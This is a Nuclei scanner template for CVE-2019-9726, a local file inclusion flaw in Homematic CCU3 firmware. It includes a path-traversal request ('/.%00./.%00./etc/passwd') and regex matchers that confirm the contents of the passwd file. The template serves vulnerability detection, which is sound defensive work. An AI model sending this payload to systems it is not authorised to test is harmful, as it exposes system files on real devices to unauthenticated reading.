nuclei-templates/http/cves/2019/CVE-2019-9726.yaml

44 lines
1.4 KiB
YAML

id: CVE-2019-9726
info:
name: Homematic CCU3 - Local File Inclusion
author: 0x_Akoko
severity: high
description: eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem, aka local file inclusion. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.
remediation: |
Apply the latest security patches or updates provided by the vendor.
reference:
- https://atomic111.github.io/article/homematic-ccu3-fileread
- https://nvd.nist.gov/vuln/detail/CVE-2019-9726
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-9726
cwe-id: CWE-22
epss-score: 0.02964
epss-percentile: 0.89769
cpe: cpe:2.3:o:eq-3:ccu3_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: eq-3
product: ccu3_firmware
tags: cve,cve2019,homematic,lfi
http:
- method: GET
path:
- "{{BaseURL}}/.%00./.%00./etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "bin:.*:0:0:"
condition: or
- type: status
status:
- 200
# digest: 490a004630440220279be9a45cb6f4536d10a6cdfa5a6932536b77d670a1a8ca79b25b30b556881e022025d252ad14068e4b78e784bbcc4c403e9ab4a651924daa33b0c72604a6b9ebb7:922c64590222798bb761d5b6d8e72950